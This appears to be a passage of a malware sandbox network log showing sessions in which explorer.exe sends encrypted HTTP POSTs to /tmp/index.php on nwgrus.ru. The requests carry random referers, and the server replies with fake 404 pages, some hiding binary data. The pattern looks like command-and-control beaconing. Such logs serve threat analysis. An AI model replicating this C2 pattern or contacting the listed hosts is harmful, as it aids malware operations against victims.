Oct 4, 2024 19:18:06.618854046 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Fri, 04 Oct 2024 17:18:06 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	49804	177.129.90.106	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 4, 2024 19:18:06.770210028 CEST	282	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://vqlmgxiqipmlfda.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 366 Host: nwgrus.ru
Oct 4, 2024 19:18:06.770246029 CEST	366	OUT	Data Raw: 3b 6e 55 10 83 bc 1a 22 aa a3 c6 01 03 05 72 b7 7b 08 bc e2 1d 04 e6 63 79 0e 08 e5 44 b7 b6 19 ed 57 c4 2d 07 68 21 6a 9b 9a 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1d 6b 2c 90 f5 76 0b 75 5d 37 b7 a0 Data Ascii: ;nU"r{cyDW-h!j? 9Yt M@NA -[k,vu]7kyvf8Efp?2tzLly:EHn%$}yfZ`dQjh2PfST!%oj%{Jl
Oct 4, 2024 19:18:08.103205919 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Fri, 04 Oct 2024 17:18:07 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	49815	177.129.90.106	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 4, 2024 19:18:08.127762079 CEST	282	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://mhabccdcfgoeshi.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 299 Host: nwgrus.ru
Oct 4, 2024 19:18:08.127770901 CEST	299	OUT	Data Raw: 3b 6e 55 10 83 bc 1a 22 aa a3 c6 01 03 05 72 b7 7b 08 bc e2 1d 04 e6 63 79 0e 08 e5 44 b7 b6 19 ed 57 c4 2d 07 68 21 6a 9b 9a 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 12 6b 2c 90 f5 76 0b 75 3c 31 cd 85 Data Ascii: ;nU"r{cyDW-h!j? 9Yt M@NA -[k,vu<1o']Bgx3s /,'iWU6F~`9Nc($4v\|?-yU18h^o`n(,NqNhU98`
Oct 4, 2024 19:18:09.566529989 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Fri, 04 Oct 2024 17:18:09 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	49819	177.129.90.106	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 4, 2024 19:18:09.710045099 CEST	282	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://qhqjabyurfswwyf.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 165 Host: nwgrus.ru
Oct 4, 2024 19:18:09.710074902 CEST	165	OUT	Data Raw: 3b 6e 55 10 83 bc 1a 22 aa a3 c6 01 03 05 72 b7 7b 08 bc e2 1d 04 e6 63 79 0e 08 e5 44 b7 b6 19 ed 57 c4 2d 07 68 21 6a 9b 9a 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 13 6b 2c 90 f5 76 0b 75 33 1b f8 9d Data Ascii: ;nU"r{cyDW-h!j? 9Yt M@NA -[k,vu3Z<_\{+S(]<X\2KMs4+< 2"c2*p(
Oct 4, 2024 19:18:11.147438049 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Fri, 04 Oct 2024 17:18:10 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	49826	177.129.90.106	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 4, 2024 19:18:11.157788992 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://jfivjaggias.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 340 Host: nwgrus.ru
Oct 4, 2024 19:18:11.157804966 CEST	340	OUT	Data Raw: 3b 6e 55 10 83 bc 1a 22 aa a3 c6 01 03 05 72 b7 7b 08 bc e2 1d 04 e6 63 79 0e 08 e5 44 b7 b6 19 ed 57 c4 2d 07 68 21 6a 9b 9a 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 10 6b 2c 90 f5 76 0b 75 3c 1a af 83 Data Ascii: ;nU"r{cyDW-h!j? 9Yt M@NA -[k,vu<Y=gYqIE7yyU[VXR%?5V"30pp;P!\|:+A* &PK/G`#@}c1:
Oct 4, 2024 19:18:12.412683010 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Fri, 04 Oct 2024 17:18:12 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	49833	177.129.90.106	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 4, 2024 19:18:12.443442106 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://oecmcnbulbfndgqw.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 298 Host: nwgrus.ru
Oct 4, 2024 19:18:12.443476915 CEST	298	OUT	Data Raw: 3b 6e 55 10 83 bc 1a 22 aa a3 c6 01 03 05 72 b7 7b 08 bc e2 1d 04 e6 63 79 0e 08 e5 44 b7 b6 19 ed 57 c4 2d 07 68 21 6a 9b 9a 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 11 6b 2c 90 f5 76 0b 75 59 4c a6 f1 Data Ascii: ;nU"r{cyDW-h!j? 9Yt M@NA -[k,vuYL}[Yv`3fk-Ctr(?6?QF+sQ$8f%z7eV6;0F67Z1UmXi+?g+QD:
Oct 4, 2024 19:18:13.846260071 CEST	223	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Fri, 04 Oct 2024 17:18:13 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 08 65 42 f1 3a 0f e9 ff 09 fc 8c e5 e5 23 98 2b cd fb 2c 5e 10 dd db c0 da 61 d9 2e 19 12 8b 07 99 16 74 52 43 f2 99 67 f4 75 a0 49 4e 1b 77 2c 12 da 20 ec 32 0b a9 86 7c 7d c8 Data Ascii: #\6eB:#+,^a.tRCguINw, 2\|}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.4	49864	177.129.90.106	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 4, 2024 19:18:18.133738041 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://tpydbdrotfs.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 325 Host: nwgrus.ru
Oct 4, 2024 19:18:18.133766890 CEST	325	OUT	Data Raw: 3b 6e 55 10 83 bc 1a 22 aa a3 c6 01 03 05 72 b7 7b 08 bc e2 1d 04 e6 63 79 0e 08 e5 44 b7 b6 19 ed 57 c4 2d 07 68 21 6a 9b 9a 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2c 5b 11 6b 2c 90 f4 76 0b 75 51 3f bd f5 Data Ascii: ;nU"r{cyDW-h!j? 9Yt M@NA ,[k,vuQ?1@ZS0/K"$hVt%[1RIAS=+Fvp;LOOOk=xes}J+eO%tMp+ghu_w3!p
Oct 4, 2024 19:18:19.448740959 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Fri, 04 Oct 2024 17:18:19 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.4	50035	177.129.90.106	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 4, 2024 19:19:28.826828003 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://qrkdkbqfwfclqg.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 131 Host: nwgrus.ru
Oct 4, 2024 19:19:28.826857090 CEST	131	OUT	Data Raw: 3b 6e 55 10 83 bc 1a 22 aa a3 c6 01 03 05 72 b7 7b 08 bc e2 1d 04 e6 63 79 0e 08 e5 44 b7 b6 19 ed 57 c4 2d 07 68 21 6a 9b 9a 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 58 47 b0 81 Data Ascii: ;nU"r{cyDW-h!j? 9Yt M@NA .[k,vuXGpsNVoeB*26YE}gR
Oct 4, 2024 19:19:30.096446991 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Fri, 04 Oct 2024 17:19:29 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.4	50036	177.129.90.106	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 4, 2024 19:19:36.436177969 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://owadrehnugjdh.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 283 Host: nwgrus.ru
Oct 4, 2024 19:19:36.436213970 CEST	283	OUT	Data Raw: 3b 6e 55 10 83 bc 1a 22 aa a3 c6 01 03 05 72 b7 7b 08 bc e2 1d 04 e6 63 79 0e 08 e5 44 b7 b6 19 ed 57 c4 2d 07 68 21 6a 9b 9a 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 2b 00 ee bd Data Ascii: ;nU"r{cyDW-h!j? 9Yt M@NA .[k,vu+kXD@pHtbOgDdT3]hW*c&$%aII-+q(G7M3W{{vRp
Oct 4, 2024 19:19:37.690862894 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Fri, 04 Oct 2024 17:19:37 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.4	50037	177.129.90.106	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 4, 2024 19:19:45.959671021 CEST	282	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://wyvokdhlnlrsvuh.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 137 Host: nwgrus.ru
Oct 4, 2024 19:19:45.959683895 CEST	137	OUT	Data Raw: 3b 6e 55 10 83 bc 1a 22 aa a3 c6 01 03 05 72 b7 7b 08 bc e2 1d 04 e6 63 79 0e 08 e5 44 b7 b6 19 ed 57 c4 2d 07 68 21 6a 9b 9a 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 48 06 e1 f0 Data Ascii: ;nU"r{cyDW-h!j? 9Yt M@NA .[k,vuHRnq?8]Nl- ];6Q#\I
Oct 4, 2024 19:19:47.222836971 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Fri, 04 Oct 2024 17:19:46 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.4	50038	177.129.90.106	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 4, 2024 19:19:57.426565886 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://daglechfqxgadh.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 142 Host: nwgrus.ru
Oct 4, 2024 19:19:57.426613092 CEST	142	OUT	Data Raw: 3b 6e 55 10 83 bc 1a 22 aa a3 c6 01 03 05 72 b7 7b 08 bc e2 1d 04 e6 63 79 0e 08 e5 44 b7 b6 19 ed 57 c4 2d 07 68 21 6a 9b 9a 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 55 07 bc 8a Data Ascii: ;nU"r{cyDW-h!j? 9Yt M@NA .[k,vuU\;MfbsUT )U&w[$F",(_0$
Oct 4, 2024 19:19:58.725389004 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Fri, 04 Oct 2024 17:19:58 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.4	50039	180.75.11.133	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 4, 2024 19:20:12.845024109 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://lshvsjxacvhbre.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 349 Host: nwgrus.ru
Oct 4, 2024 19:20:12.845060110 CEST	349	OUT	Data Raw: 3b 6e 55 10 83 bc 1a 22 aa a3 c6 01 03 05 72 b7 7b 08 bc e2 1d 04 e6 63 79 0e 08 e5 44 b7 b6 19 ed 57 c4 2d 07 68 21 6a 9b 9a 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 73 18 af f3 Data Ascii: ;nU"r{cyDW-h!j? 9Yt M@NA .[k,vusa@>'zGP$S\|F1:1]Wj]P;Gj1R1Y9`nX9?$=[t:i\z[9@m>e&7
Oct 4, 2024 19:20:14.259684086 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Fri, 04 Oct 2024 17:20:14 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.4	50040	180.75.11.133	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 4, 2024 19:20:26.766762018 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://nweaheqhdcfapi.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 289 Host: nwgrus.ru
Oct 4, 2024 19:20:26.766762018 CEST	289	OUT	Data Raw: 3b 6e 55 10 83 bc 1a 22 aa a3 c6 01 03 05 72 b7 7b 08 bc e2 1d 04 e6 63 79 0e 08 e5 44 b7 b6 19 ed 57 c4 2d 07 68 21 6a 9b 9a 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 5d 37 ae 9b Data Ascii: ;nU"r{cyDW-h!j? 9Yt M@NA .[k,vu]7"vfL8@xFLc/t[""[}6HS51Y3j#>ESH,q1]9XL%Pf2B.s6(Q&z
Oct 4, 2024 19:20:28.126101017 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Fri, 04 Oct 2024 17:20:27 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.4	50041	180.75.11.133	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 4, 2024 19:20:41.512470007 CEST	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://jwpopyrbbpjc.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 330 Host: nwgrus.ru
